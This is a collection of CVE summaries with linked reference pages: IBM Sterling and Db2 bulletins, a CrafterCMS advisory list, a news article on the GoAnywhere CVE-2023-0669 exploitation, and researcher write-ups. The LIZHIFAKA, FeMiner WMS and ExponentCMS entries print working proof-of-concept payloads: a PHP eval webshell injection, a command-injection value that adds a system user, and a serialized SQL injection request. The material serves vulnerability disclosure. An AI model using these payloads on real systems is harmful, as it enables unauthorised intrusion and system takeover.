IBM Sterling B2B Integrator Standard Edition 6.0.0.0 through 6.0.3.7 and 6.1.0.0 through 6.1.2.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 238684.

  

**Summary**

IBM Sterling B2B Integrator has addressed the cross-site scripting security vulnerability.

**Vulnerability Details**

**CVEID:**   CVE-2022-43579  
**DESCRIPTION:**   IBM Sterling B2B Integrator Standard Edition is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 4.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/238684 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)

**Affected Products and Versions**

**Affected Product(s)**

**Version(s)**

IBM Sterling B2B Integrator

6.0.0.0 - 6.0.3.7

IBM Sterling B2B Integrator

6.1.0.0 - 6.1.2.0

  

**Remediation/Fixes**

**Product  
**

**Version**

**APAR**

**Remediation & Fix**

IBM Sterling B2B Integrator

6.0.0.0 - 6.0.3.7

IT42394

Apply 6.0.3.8

IBM Sterling B2B Integrator

6.1.0.0 - 6.1.2.0

IT42394

Apply 6.1.2.1

The IIM versions of 6.0.3.8 and 6.1.2.1 are available on Fix Central. 

The container version of 6.1.2.1 is available in IBM Entitled Registry with following tags.  

*   cp.icr.io/cp/ibm-b2bi/b2bi:6.1.2.1 for IBM Sterling B2B Integrator
*   cp.icr.io/cp/ibm-sfg/sfg:6.1.2.1 for IBM Sterling File Gateway

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

10 Feb 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS3JSW","label":"IBM Sterling B2B Integrator"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"},{"code":"PF002","label":"AIX"}\],"Version":"6.0.0.0 - 6.1.2.1","Edition":"","Line of Business":{"code":"LOB59","label":"Sustainability Software"}}\]

CVE-2022-43579: Security Bulletin: IBM Sterling B2B Integrator is vulnerable to cross-site scripting (CVE-2022-43579)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Crafter Studio on Linux, MacOS, Windows, x86, ARM, 64 bit allows SQL Injection.This issue affects CrafterCMS v4.0 from 4.0.0 through 4.0.1, and v3.1 from 3.1.0 through 3.1.26.

CrafterCMS

*   

**CV-2023021701**

 

**Date**

2023.02.17

**Affected Versions**

**4.0** <= 4.0.1, **3.1** =< 3.1.26

**Vulnerability Type**

CWE-89 Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)

**Risk**

Medium

**Description**

Authenticated administrators can perform a SQL Injection attack against the authoring database that holds Studio users, groups, and item workflow states.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2023-26020

**Credit**

Gil Correia, gil.correia@devoteam.com

**CV-2022091302**

 

**Date**

2022.09.13

**Affected Versions**

**3.1** < 3.1.23

**Vulnerability Type**

CWE-913 Improper Control of Dynamically-Managed Code Resources

**Risk**

Medium

**Description**

Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via Groovy Sandbox Bypass.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2022-40635

**Credit**

Matei “Mal” Badanoiu, https://github.com/mbadanoiu

**CV-2022091301**

 

**Date**

2022.09.13

**Affected Versions**

**3.1** < 3.1.23

**Vulnerability Type**

CWE-913 Improper Control of Dynamically-Managed Code Resources

**Risk**

Medium

**Description**

Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker SSTI.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2022-40634

**Credit**

Matei “Mal” Badanoiu, https://github.com/mbadanoiu

**CV-2022051603**

 

**Date**

2022.05.16

**Affected Versions**

**3.1** < 3.1.18

**Vulnerability Type**

CWE-913 Improper Control of Dynamically-Managed Code Resources

**Risk**

High

**Description**

Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker static methods.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2021-23267

**Credit**

Kai Zhao (ToTU Security Team), https://github.com/happyhacking-k

**CV-2022051602**

 

**Date**

2022.05.16

**Affected Versions**

**3.1** < 3.1.18

**Vulnerability Type**

CWE-117 Improper Output Neutralization for Logs

**Risk**

Medium

**Description**

An anonymous user can craft a URL with text that ends up in the log viewer as is.The text can then include textual messages to mislead the administrator.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2021-23266

**Credit**

Faizan Wani, https://github.com/faizanw8

**CV-2021120106**

 

**Date**

2021.12.01

**Affected Versions**

**3.1** < 3.1.15

**Vulnerability Type**

CWE-402: Transmission of Private Resources into a New Sphere (‘Resource Leak’)

**Risk**

Medium

**Description**

Transmission of Private Resources into a New Sphere (‘Resource Leak’) in CrafterEngine

**CVE**

https://www.cve.org/CVERecord?id=CVE-2021-23263

**Credit**

Carlos Ortiz, https://github.com/cortiz

**CV-2021120107**

 

**Date**

2021.12.01

**Affected Versions**

**3.1** < 3.1.15

**Vulnerability Type**

CWE-402: Transmission of Private Resources into a New Sphere (‘Resource Leak’) CWE-668 Exposure of Resource to Wrong Sphere

**Risk**

High

**Description**

Transmission of Private Resources into a New Sphere (‘Resource Leak’) and Exposureof Resource to Wrong Sphere in Crafter Search

**CVE**

https://www.cve.org/CVERecord?id=CVE-2021-23264

**Credit**

Sparsh Kulshrestha, https://github.com/sparshkulshrestha

**CV-2020080102**

 

**Date**

2020.08.01

**Affected Versions**

**3.0** < 3.0.27  
**3.1** < 3.1.7

**Vulnerability Type**

RCE

**Risk**

Medium

**Description**

Authenticated attackers with developer privileges in Crafter Studio may execute OS commands via deep inspection of FreeMarker template exposed objects.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2020-25803

**Credit**

Alvaro Muñoz (GitHub), https://github.com/pwntester

**CV-2017061502**

 

**Date**

2017.06.15

**Affected Versions**

**3.0** < 3.0.1

**Vulnerability Type**

Directory Traversal

**Risk**

Critical

**Description**

A directory traversal vulnerability exists which allows unauthenticated attackers to overwrite files from the operating system which can lead to RCE.

**CVE**

https://www.cve.org/CVERecord?id=CVE-2017-15681

**Credit**

Jasmin Landry, https://github.com/JR0ch17

CVE-2023-26020: Security Advisories — CrafterCMS 4.0.2 documentation

IBM Db2 for Linux, UNIX and Windows 10.5, 11.1, and 11.5 is vulnerable to an Information Disclosure as sensitive information may be included in a log file. IBM X-Force ID: 241677.

  

**Summary**

IBM® Db2® is vulnerable to an information disclosure vulnerability as sensitive information may be included in a log file.

**Vulnerability Details**

**CVEID:**   CVE-2022-43930  
**DESCRIPTION:**   IBM Db2 is vulernable to an Information Disclosure as sensitive information may be included in a log file.  
CVSS Base score: 6.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/241677 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**Affected Products and Versions**

All fix pack levels of IBM Db2  V10.5, V11.1, and V11.5  editions on Windows are affected.  Linux, and Unix are not impacted.  

  

**Remediation/Fixes**

Customers running any vulnerable fixpack level of an affected Program,  V10.5, v11.1 and V11.5, can download the special build containing the interim fix for this issue from Fix Central. These special builds are available based on the most recent fixpack level for each impacted release:  V10.5 FP11, V11.1.4 FP7, and V11.5.8. They can be applied to any affected fixpack level of the appropriate release to remediate this vulnerability.

**Release**

**Fixed in fix pack**

**APAR**

**Download URL**

V10.5

TBD

DT174059

Special Build for V10.5 FP11:

Windows 32-bit, x86  
Windows 64-bit, x86

V11.1

TBD

DT174059

Special Build for V11.1.4 FP7:

Windows 32-bit, x86  
Windows 64-bit, x86

V11.5

TBD

DT174059

Special Build for V11.5.8:

Windows 32-bit, x86  
Windows 64-bit, x86

IBM does not disclose key Db2 functionality nor replication steps for a vulnerability to avoid providing too much information to any potential malicious attacker. IBM does not want to enable a malicious attacker with sufficient knowledge to craft an exploit of the vulnerability.

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

08 Feb 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSEPGG","label":"Db2 for Linux, UNIX and Windows"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"}\],"Version":"10.5, 11.1, 10.5","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2022-43930: IBM® Db2® is vulnerable to an information disclosure vulnerability as sensitive information may be included in a log file. (CVE-2022-43930)

Permissions vulnerability in LIZHIFAKA v.2.2.0 allows authenticated attacker to execute arbitrary commands via the set password function in the admin/index/email location.

Sorry for my bad english

English：  
/admin/index/email (Requires admin rights) The setting password option in this location can write arbitrary content to /config/email.php to obtain website permissions  
Chinese：  
/admin/index/email （需要管理员权限） 后台修改email密码处可以getshell获取网站权限

POC：  
POST /admin/api/config/editEmail HTTP/1.1  
Host: www.lizhi.top  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0  
Accept: _/_  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 49  
Origin: http://www.lizhi.top  
Connection: close  
Referer: http://www.lizhi.top/admin/index/email  
Cookie: PHPSESSID=jedhau3007vnla9hjdv228ugdi

smtp=smtp.163.com&port=994&user=admin&pass=admin','test'=>"${@eval($\_POST\['a'\])};",'a'=>'

CVE-2021-34164: An issue was discovered in LIZHIFAKA 2.2.0 · Issue #22 · lizhipay/faka

An issue in FeMiner WMS v1.1 allows attackers to execute arbitrary code via the filename parameter and the exec function.

**Vulnerability Type :**

Command execution

**Vulnerability Version :**

1.1

**Recurring environment:**

Windows Server 2012  
PHP 5.5.38  
Apache 2.4  
Mysql 5.6

**Vulnerability Description AND recurrence:**

During installation, use the db\_wms\_2013\_12\_31\_15\_48\_34.sql file in the \\system\\ directory for installation

In the /system/databak.php file, the parameter filename was received through $\_POST, and it was not filtered. The exec function was brought in, resulting in a command execution vulnerability.

There is no echo here, let's test adding a system user here  

payload： filename=1 || net user test /add

CVE-2021-33949: Command execution vulnerability in /wms/src/system/databak.php · Issue #10 · FeMiner/wms

Buffer Overflow vulnerability in Saltstack v.3003 and before allows attacker to execute arbitrary code via the func variable in salt/salt/modules/status.py file.

CVE-2021-33226: salt/status.py at master · saltstack/salt

SQL Injection vulnerability in Exponent-CMS v.2.6.0 fixed in 2.7.0 allows attackers to gain access to sensitive information via the selectValue function in the expConfig class.

**Vulnerability Info****Vulnerability Type**

ExponentCMS unauthticate sql injection

**Vulnerability Version**

v2.6.0

exponentcms/exponent-cms#1542

**Recurring environment**

*   Windows 10\* PHP 5.4.5\* Apache 2.4.23

**Author**

pang0lin@webray.com.cn inc.

**Vulnerability Description AND recurrence:**

1.  The security issue is occured at file \\framework\\modules\\eaas\\controllers\\eaasController.php The line number nearby 76.
    
        public function api() {
             if (empty($this->params['apikey'])) {
                 $_REQUEST['apikey'] = true;  // set this to force an ajax reply
                 $ar = new expAjaxReply(550, 'Permission Denied', 'You need an API key in order to access Exponent as a Service', null);
                 $ar->send();  //FIXME this doesn't seem to work correctly in this scenario
             } else {
                 $key = expUnserialize(base64_decode(urldecode($this->params['apikey'])));  //step 1
                 if (is_object($key) && $key->mod === "eaas") {
                     preg_match('/[a-zA-Z0-9_@]*/', $key->src, $matches);
                     $key->src = $matches[0];
                     // var_dump($key);
                     $cfg = new expConfig($key); // step 2
                     $this->config = $cfg->config;
                     $cfg = new expConfig($key);
                     $this->config = $cfg->config;
                 }
                 if(empty($cfg->id)) {
                     $ar = new expAjaxReply(550, 'Permission Denied', 'Incorrect API key or Exponent as a Service module configuration missing', null);
                     $ar->send();
                 } else {
                     if (!empty($this->params['get'])) {
                         $this->handleRequest();
                     } else {
                         $ar = new expAjaxReply(200, 'ok', 'Your API key is working, no data requested', null);
                         $ar->send();
                     }
                 }
             }
         }
        
    

2.  We can see issue with steps. step 1. The user's input apikey can be decoded with base64 and serilized.

step 2. The key goes into class of 'expConfig'. we try to find the definition.

        class expConfig extends expRecord {
    	protected $table = 'expConfigs';
    
    	function __construct($params=null) {
    		global $db;
    
            if (!is_array($params)) {
                $this->location_data = serialize($params);
                parent::__construct($db->selectValue($this->table, 'id', "location_data='".$this->location_data."'"));  //step 3
            } else {
                parent::__construct($params);
            }
    
    		// treat the loc data like an id - if the location data come thru as an object we need to look up the record
                //         if (!empty($params->src)) {
                //             echo "1";
                //             // if we hav a src, ie this controller has sources
                // parent::__construct($db->selectValue($this->table, 'id', "location_data='".$this->location_data."'"));
                //         } else {
                //             echo "2";
                //             // if we don't have a sourced controller, might still have a config for it.
                // parent::__construct($db->selectValue($this->table, 'id'));
                //}
    		$this->config = expUnserialize($this->config);
            if (!is_array($this->config)) {
                $this->config = array();
            }
            // now to artificially attach any file objects to the config
            if (!empty($this->config['expFile'])) {
                foreach ($this->config['expFile'] as $type=>$file) {
                    if (is_array($file)) foreach ($file as $key=>$filenum) {
                        if (is_numeric($filenum)) {
                            $this->config['expFile'][$type][$key] = new expFile($filenum);
                        } elseif (!is_object($filenum)) {
                            unset($this->config['expFile'][$type][$key]);
                        }
                    }
                }
            }
    	}
    

3.  At step 3. We can see the variable '$this->location\_data' derectly use by function 'selectValue' without any filter.Try to find the definition.

            /**
        * @param  $table
        * @param  $col
        * @param null $where
        * @return null
        */
       function selectValue($table, $col, $where=null) {
           if ($where == null)
               $where = "1";
           $sql = "SELECT " . $col . " FROM `" . $this->prefix . "$table` WHERE $where LIMIT 0,1";  //step 4
      
           $res = @mysqli_query($this->connection, $sql);
    
           if ($res == null)
               return null;
           $obj = mysqli_fetch_object($res);
           if (is_object($obj)) {
               return $obj->$col;
           } else {
               return null;
           }
       }
    

4.  Now. it's clearly to understand the issue. The user input is like . $a = new eaasController();$a->mod = 'eaas';$a->src="aaaaaabbbb";$a->abc="1' union select sleep(5) -- a";var\_dump(urlencode(base64\_encode(serialize($a)))); then, we can use this payload to test if the target is vulnerable. If the target is vulnerable, the request will use more than 10s.

    POST /index.php HTTP/1.1
    Host: exponentcms.org
    
    controller=eaas&action=api&get=photos&apikey=TzoxNDoiZWFhc0NvbnRyb2xsZXIiOjI4OntzOjExOiJ1c2VyYWN0aW9ucyI7YToxOntzOjc6InNob3dhbGwiO3M6MTk6Ikluc3RhbGwgU2VydmljZSBBUEkiO31zOjE0OiJyZW1vdmVfY29uZmlncyI7YToxMDp7aTowO3M6MTE6ImFnZ3JlZ2F0aW9uIjtpOjE7czoxMDoiY2F0ZWdvcmllcyI7aToyO3M6ODoiY29tbWVudHMiO2k6MztzOjc6ImVhbGVydHMiO2k6NDtzOjg6ImZhY2Vib29rIjtpOjU7czo1OiJmaWxlcyI7aTo2O3M6MTA6InBhZ2luYXRpb24iO2k6NztzOjM6InJzcyI7aTo4O3M6NDoidGFncyI7aTo5O3M6NzoidHdpdHRlciI7fXM6NDoidGFicyI7YTo3OntzOjc6ImFib3V0dXMiO3M6ODoiQWJvdXQgVXMiO3M6NDoiYmxvZyI7czo0OiJCbG9nIjtzOjU6InBob3RvIjtzOjY6IlBob3RvcyI7czo1OiJtZWRpYSI7czo1OiJNZWRpYSI7czo1OiJldmVudCI7czo2OiJFdmVudHMiO3M6MTI6ImZpbGVkb3dubG9hZCI7czoxNDoiRmlsZSBEb3dubG9hZHMiO3M6NDoibmV3cyI7czo0OiJOZXdzIjt9czo3OiIAKgBkYXRhIjthOjA6e31zOjEyOiIAKgBjbGFzc25hbWUiO3M6MTQ6ImVhYXNDb250cm9sbGVyIjtzOjEzOiJiYXNlY2xhc3NuYW1lIjtzOjQ6ImVhYXMiO3M6OToiY2xhc3NpbmZvIjtOO3M6MTQ6ImJhc2Vtb2RlbF9uYW1lIjtzOjk6ImV4cFJlY29yZCI7czoxMToibW9kZWxfdGFibGUiO047czoxNDoiACoAcGVybWlzc2lvbnMiO2E6NTp7czo2OiJtYW5hZ2UiO3M6NjoiTWFuYWdlIjtzOjk6ImNvbmZpZ3VyZSI7czo5OiJDb25maWd1cmUiO3M6NjoiY3JlYXRlIjtzOjY6IkNyZWF0ZSI7czo0OiJlZGl0IjtzOjQ6IkVkaXQiO3M6NjoiZGVsZXRlIjtzOjY6IkRlbGV0ZSI7fXM6MTY6IgAqAG1fcGVybWlzc2lvbnMiO2E6Njp7czo4OiJhY3RpdmF0ZSI7czo4OiJBY3RpdmF0ZSI7czo3OiJhcHByb3ZlIjtzOjc6IkFwcHJvdmUiO3M6NToibWVyZ2UiO3M6NToiTWVyZ2UiO3M6NjoicmVyYW5rIjtzOjY6IlJlUmFuayI7czo2OiJpbXBvcnQiO3M6MTI6IkltcG9ydCBJdGVtcyI7czo2OiJleHBvcnQiO3M6MTI6IkV4cG9ydCBJdGVtcyI7fXM6MjE6IgAqAHJlbW92ZV9wZXJtaXNzaW9ucyI7YTowOnt9czoxODoiACoAYWRkX3Blcm1pc3Npb25zIjthOjA6e31zOjIxOiIAKgBtYW5hZ2VfcGVybWlzc2lvbnMiO2E6MDp7fXM6MTQ6InJlcXVpcmVzX2xvZ2luIjthOjA6e31zOjg6ImZpbGVwYXRoIjtzOjgwOiIvcGhwc3R1ZHlfcHJvL1dXVy9leHBvbmVudC9mcmFtZXdvcmsvbW9kdWxlcy9lYWFzL2NvbnRyb2xsZXJzL2VhYXNDb250cm9sbGVyLnBocCI7czo4OiJ2aWV3cGF0aCI7czo2MDoiL3BocHN0dWR5X3Byby9XV1cvZXhwb25lbnQvZnJhbWV3b3JrL21vZHVsZXMvZWFhcy92aWV3cy9lYWFzIjtzOjE3OiJyZWxhdGl2ZV92aWV3cGF0aCI7czoxNToiZWFhcy92aWV3cy9lYWFzIjtzOjEwOiJhc3NldF9wYXRoIjtzOjQwOiIvZXhwb25lbnQvZnJhbWV3b3JrL21vZHVsZXMvZWFhcy9hc3NldHMvIjtzOjY6ImNvbmZpZyI7YTowOnt9czo2OiJwYXJhbXMiO2E6MDp7fXM6MzoibG9jIjtPOjg6InN0ZENsYXNzIjozOntzOjM6Im1vZCI7czo0OiJlYWFzIjtzOjM6InNyYyI7czowOiIiO3M6MzoiaW50IjtzOjA6IiI7fXM6MTE6ImNvZGVxdWFsaXR5IjtzOjY6InN0YWJsZSI7czoxNDoicnNzX2lzX3BvZGNhc3QiO2I6MDtzOjQ6ImVhYXMiO086OToiZXhwUmVjb3JkIjoyMzp7czoxMjoiACoAY2xhc3NpbmZvIjtOO3M6OToiY2xhc3NuYW1lIjtzOjk6ImV4cFJlY29yZCI7czo5OiJ0YWJsZW5hbWUiO3M6OToiZXhwUmVjb3JkIjtzOjEwOiJpZGVudGlmaWVyIjtzOjI6ImlkIjtzOjEzOiJyYW5rX2J5X2ZpZWxkIjtzOjA6IiI7czoxMjoiZ3JvdXBpbmdfc3FsIjtzOjA6IiI7czoxOToiaGFzX2V4dGVuZGVkX2ZpZWxkcyI7YTowOnt9czo3OiJoYXNfb25lIjthOjA6e31zOjg6Imhhc19tYW55IjthOjA6e31zOjEzOiJoYXNfbWFueV9zZWxmIjthOjA6e31zOjIzOiJoYXNfYW5kX2JlbG9uZ3NfdG9fbWFueSI7YTowOnt9czoyMzoiaGFzX2FuZF9iZWxvbmdzX3RvX3NlbGYiO2E6MDp7fXM6MTg6ImRlZmF1bHRfc29ydF9maWVsZCI7czowOiIiO3M6MjI6ImRlZmF1bHRfc29ydF9kaXJlY3Rpb24iO3M6MDoiIjtzOjEzOiJnZXRfYXNzb2NfZm9yIjthOjA6e31zOjI0OiIAKgBhdHRhY2hhYmxlX2l0ZW1fdHlwZXMiO2E6MDp7fXM6MjQ6ImF0dGFjaGFibGVfaXRlbXNfdG9fc2F2ZSI7TjtzOjE4OiJnZXRfYXR0YWNoYWJsZV9mb3IiO2E6MDp7fXM6ODoidmFsaWRhdGUiO2E6MDp7fXM6OToidmFsaWRhdGVzIjthOjA6e31zOjE1OiJkb19ub3RfdmFsaWRhdGUiO2E6MDp7fXM6MTg6InN1cHBvcnRzX3JldmlzaW9ucyI7YjowO3M6MTQ6Im5lZWRzX2FwcHJvdmFsIjtiOjA7fXM6MzoibW9kIjtzOjQ6ImVhYXMiO3M6Mzoic3JjIjtzOjEwOiJhYWFhYWFiYmJiIjtzOjM6ImFiYyI7czoyOToiMScgdW5pb24gc2VsZWN0IHNsZWVwKDUpIC0tIGEiO30%3D

CVE-2021-32441: CVEproject/ExponentCMS_v2.6.0_sqli.md at main · pang0lin/CVEproject

Weeks after an exploit was first announced in a popular cloud-based file transfer service, could some organizations still be vulnerable? The answer is yes.

Last week, the Cybersecurity and Infrastructure Security Agency (CISA) added three new entries to its Known Exploited Vulnerabilities catalog. Among them was CVE-2023-0669, a bug that has paved the way for exploits and follow-on ransomware attacks against hundreds of organizations in recent weeks.

The bug was discovered in GoAnywhere, a Windows-based file-sharing software from Fortra, formerly HelpSystems. According to its website, GoAnywhere is used at more than 3,000 organizations to manage documents of all kinds. According to data from Enlyft, most of those are large organizations — with at least 1,000 and, often, more than 10,000 employees — mostly based in the United States.

The bug tracked as CVE-2023-0669 allows hackers to remotely execute code in target systems, through the internet, without need for authentication. As of this writing, this vulnerability has not yet received an official CVSS rating from the National Vulnerability Database.

But we need not wonder about how dangerous it is, as hackers have already pounced. On Feb. 10 — days after Fortra released a patch — the Clop ransomware gang claimed to have exploited CVE-2023-0669 in over 130 organizations.

After three weeks and counting, it's unclear whether or not more organizations are still at risk.

**Timeline of the GoAnywhere Exploit(s)**

On Feb. 2, two abnormal commands triggered alerts in an IT environment monitored by endpoint detection and response (EDR) vendor Huntress. Both were executed on a host designated for processing transactions on the GoAnywhere platform, though the significance of this wasn't clear yet.

"At first glance, the alert itself was fairly generic," wrote Joe Slowik, threat intelligence manager for Huntress. "But further analysis revealed a more interesting set of circumstances."

An entity on this alerted network had attempted to download a file from a remote resource. Slowik and his colleagues tried to access the file themselves, but by then the port used to download it had been closed up. "We don't really know for certain why," Slowik tells Dark Reading. "It's possible that the adversary was working at a very rapid clip."

They did have the IP address of that entity, however, which traced back to Bulgaria, and was flagged as malicious by VirusTotal. The actor seemed to be from outside of the organization, and had used their first command to download and run a dynamic link library (DLL) file.

"Knowing that the DLL was also executed further raised the risk level of the incident," Slowik says, "since if it was malware that was downloaded, it is now running on the system."

There were other signs, too, that this was a compromise. But even after isolating the relevant server, a second server at the targeted organization became infected. "We were worried that we had a very persistent adversary," Slowik recalls.

The researchers still lacked a copy of the downloaded malware, but all of the evidence surrounding it seemed to accord with activity previously associated with a malware family called Truebot. "The post in the URI structure that was used mapped to earlier Truebot samples," Slowik says. "The DLL exports that were referenced in order to launch the malware, or similar to historical tripod samples, as well as some strings and code structures, all matched. Within the samples themselves, all of it aligned very nicely with what had previously been reported in 2022 for Truebot."

Truebot has been linked to a prolific Russian group called TA505. Notably, TA505 has utilized the ransomware-as-a-service (RaaS) malware "Clop" in previous attacks.

On the same day as Slowik's investigation, reporter Brian Krebs publicly republished an advisory Fortra had sent to its users the day before. GoAnywhere was being exploited, its developers explained, and they were implementing a temporary service outage in response.

Whatever mitigations were taken weren't enough. On Feb. 10, hackers behind the Clop ransomware told Bleeping Computer that they’d used the GoAnywhere exploit to breach over more than organizations.

**How CVE-2023-0669 Works**

CVE-2023-0669 is a cross-site request forgery (CSRF) but that arises from how unpatched GoAnywhere users install their software licenses.

Interestingly, it was as much a design choice as an oversight. "Typically, installing a license involves downloading a license file from a server and uploading it to your device," explains Ron Bowes, lead security researcher for Rapid7, who released the most detailed publicized analysis of how an internal user could trigger the exploit. "Fortra chose to make that whole process transparent, where the license is delivered through the administrator's browser. That means the user gets a much smoother experience."

However, that seamlessness came at a cost. "There is no CSRF protection (and the cookie is not actually required, so no authentication is required to exploit this issue)," Bowes explained in his analysis. "That means that this can, by design, be exploited via cross-site request forgery."

In its report, Rapid7 labeled the exploitability of this vulnerability as "very high."

"While the administration port should not be exposed to the internet," Bowes says, "it's very easy to configure it that way by mistake. And once an attacker understands the vulnerability, it can be exploited without any risk of crashing the application or corrupting data."

Rapid7 also labeled "very high" the value of such an exploit to an attacker. As Bowes explains, "due to the nature of the application (managed file transfer, or MFT), it's common for a GoAnywhere MFT server to sit on a network perimeter and to have the file transfer ports publicly exposed. This makes it a good target for both pivoting into an organization's internal network, and/or stealing potentially sensitive data directly off the target."

On Feb. 6, Fortra fixed CVE-2023-0669 "by adding what they call a 'license request token,'" Bowes explains, "which is included in the encrypted request to Fortra's server. It behaves exactly as a CSRF token would, preventing an attacker from leveraging an administrator's browser."

**What to Do Now**

As severe as the exploit is, only a fraction of GoAnywhere customers are vulnerable to outside hackers through CVE-2023-0669. However, even those without Internet-exposed GoAnywhere instances are still vulnerable to internal users or attackers who have gained initial compromise to a network via regular Web browsers.

The bug can be exploited remotely if an organization’s GoAnywhere administration port — 8000 or 8001 — is exposed on the Internet. As of last week, more than 1,000 GoAnywhere instances were exposed, but, Bleeping Computer explained, only 135 of those pertained to the relevant ports 8000 and 8001. Most of those vulnerable seem to have already been swept up in one big campaign by the Clop group.

"We urgently advise all GoAnywhere MFT customers to apply this patch," Fortra wrote in another advisory to its internal customers. "Particularly for customers running an admin portal exposed to the Internet, we consider this an urgent matter."

Massive GoAnywhere RCE Exploit: Everything You Need to Know

IBM Db2 for Linux, UNIX and Windows 10.5, 11.1, and 11.5 is vulnerable to information Disclosure due to improper privilege management when a specially crafted table access is used. IBM X-Force ID: 241671.

CVE-2022-43927: IBM Db2 for Linux, UNIX and Windows information disclosure CVE-2022-43927 Vulnerability Report

IBM Db2 for Linux, UNIX and Windows 11.1 and 11.5 may be vulnerable to a Denial of Service when executing a specially crafted 'Load' command. IBM X-Force ID: 241676.

  

**Summary**

IBM® Db2® may be vulnerable to a denial of service when executing a specially crafted 'Load' command.

**Vulnerability Details**

**CVEID:**   CVE-2022-43929  
**DESCRIPTION:**   IBM Db2 may be vulnerable to a Denial of Service when executing a specially crafted 'Load' command.  
CVSS Base score: 6.2  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/241676 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

All fix pack levels of IBM Db2  V11.1, and V11.5 server editions on all platforms are affected. 

IBM Db2 V10.5 is not affected.

  

**Remediation/Fixes**

